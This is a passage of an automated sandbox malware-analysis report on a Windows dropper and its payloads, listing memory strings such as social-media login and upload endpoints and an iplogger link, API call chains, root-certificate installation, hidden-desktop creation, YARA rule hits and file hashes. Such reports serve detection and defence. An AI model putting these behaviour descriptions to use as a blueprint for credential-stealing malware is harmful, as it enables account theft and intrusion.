Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/drive/settings51iB7
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp | String found in binary or memory: https://feedback.googleusercontent.com
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp | String found in binary or memory: https://fonts.googleapis.com;
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp | String found in binary or memory: https://fonts.gstatic.com;
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmp | String found in binary or memory: https://hangouts.google.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmp | String found in binary or memory: https://iplogger.org/14Zhe7
Source: 1E1C360C582DF797.exe | String found in binary or memory: https://mail.google.com/mail
Source: 1E1C360C582DF797.exe | String found in binary or memory: https://mail.google.com/mail/#settings
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp | String found in binary or memory: https://mail.google.com/mail/#settingsox
Source: 1E1C360C582DF797.exe, 00000019.00000003.641771168.0000000005C4D000.00000004.00000001.sdmp | String found in binary or memory: https://mail.google.com/mailx
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.641771168.0000000005C4D000.00000004.00000001.sdmp | String found in binary or memory: https://payments.google.com/
Source: 1E1C360C582DF797.exe | String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp | String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jstW2
Source: 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp | String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.641771168.0000000005C4D000.00000004.00000001.sdmp | String found in binary or memory: https://sandbox.google.com/
Source: 1E1C360C582DF797.exe | String found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 1E1C360C582DF797.exe | String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmp | String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsuSS4
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: h1GodtbhC8.exe | String found in binary or memory: https://sectigo.com/CPS0
Source: h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr | String found in binary or memory: https://sectigo.com/CPS0D
Source: 1E1C360C582DF797.exe, 00000015.00000003.563235849.0000000005D32000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 1E1C360C582DF797.exe, 00000015.00000003.563164310.0000000005D4D000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmpZk
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | String found in binary or memory: https://twitter.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | String found in binary or memory: https://twitter.com/ookie:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | String found in binary or memory: https://twitter.comReferer:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | String found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | String found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | String found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe.4.drString found in binary or memory: https://www.digicert.com/CPS0
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.google.com/cloudprint
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.google.com/cloudprint/enab
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorHN9
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint7=
Source: 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com;
Source: 1E1C360C582DF797.exe, 00000019.00000003.641771168.0000000005C4D000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messagingP
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.641821279.0000000005C56000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyourc2
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/clouddevicesH
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.googleapis.com/auth/h
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangoutse2/crx
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 1E1C360C582DF797.exeString found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra/crx0
Source: 1E1C360C582DF797.exe, 1E1C360C582DF797.exe, 00000019.00000003.638788974.0000000005C21000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: 1E1C360C582DF797.exe, 00000019.00000003.641274021.0000000005C68000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accept:
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/accept:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/login/nonce/
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/origin:
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

E-Banking Fraud:

Registers a new ROOT certificate
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E624C20 _DebugHeapAllocator,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,std::ios_base::good,ExpandEnvironmentStringsW,_DebugHeapAllocator,Concurrency::details::ContextBase::GetWorkQueueIdentity,Concurrency::details::ContextBase::GetWorkQueueIdentity,GetCurrentThreadId,GetThreadDesktop,CreateDesktopW,GetLastError,SetThreadDesktop,GetLastError,CloseDesktop,CreateProcessW,GetLastError,CloseDesktop,FindCloseChangeNotification,CreateJobObjectW,AssignProcessToJobObject,_DebugHeapAllocator,Sleep,Sleep,_DebugHeapAllocator,SetThreadDesktop,CloseDesktop,TerminateProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,

System Summary:

Malicious sample detected (through community Yara rule)
Source: 21.2.1E1C360C582DF797.exe.5320000.10.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Author: unknown
Source: 21.2.1E1C360C582DF797.exe.4e60000.9.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Author: unknown
Source: 25.2.1E1C360C582DF797.exe.5230000.6.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text section
Source: aliens.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 1E1C360C582DF797.exe.4.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_01217165: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_004079A2
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_004049A8
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_00406EFE
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_0040737E
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E66CE40
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E66AE3E
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E679FF6
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E67BC5D
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E67FC01
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E67BB3D
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E657714
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E6677A0
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E66756E
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E66733C
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_01218525
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_012265B6
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_01230146
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0121E1E0
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0122702F
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0121404E
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0121326D
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0123457A
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0123055E
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_01223731
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_012347A9
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0121E7E0
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_012127D4
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_012239AC
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_01230993
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_012269EB
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0121F8A8
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_01225BE7
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0123CA20
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0121BD53
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0121DDAC
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_01230DC8
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0122FC4A
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0121EC54
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_01223CDD
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_01215F0C
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_01240FD4
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0123CECE
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_00403DA8
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_00407071
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_1000C063
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_1000B883
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_100060F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_100169BD
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_100099E0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_100071F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10009257
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10010AED
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10008340
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_1000E380
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_1000ABA0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_1000B3B0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_1001EBD0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_100083F0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_1000BC57
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_1000C483
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10010590
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_1001EDDB
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_1000FF71
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_026EB7CE
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_026E75D0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_026DEAA1
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_026F2BB0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_026E6D04
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_04E93BFE
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_04E8E58A
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_04EA0780
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_04E8C019
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_04E83C51
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_04EA2F70
Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\71eza90awf48\aliens.exe 6781F617A3F74D85AC7113828B2BE7D0186E32259FD6B4C10E18C6233CB97549
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dll DBE5A7DAF5BCFF97F7C48F9B5476DB3072CC85FBFFD660ADAFF2E0455132D026
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: String function: 04E61320 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: String function: 026E9F94 appears 49 times
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: String function: 6E627EA0 appears 41 times
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: String function: 0122E1C0 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: String function: 0122E0E4 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: String function: 0122EB60 appears 31 times
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: String function: 10010534 appears 35 times
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: String function: 004067A9 appears 58 times
Source: h1GodtbhC8.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: h1GodtbhC8.exe, 00000000.00000003.367160882.0000000000745000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSibClr.dll. vs h1GodtbhC8.exe
Source: h1GodtbhC8.exe, 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameSibuia.dllN vs h1GodtbhC8.exe
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Section loaded: dxgidebug.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
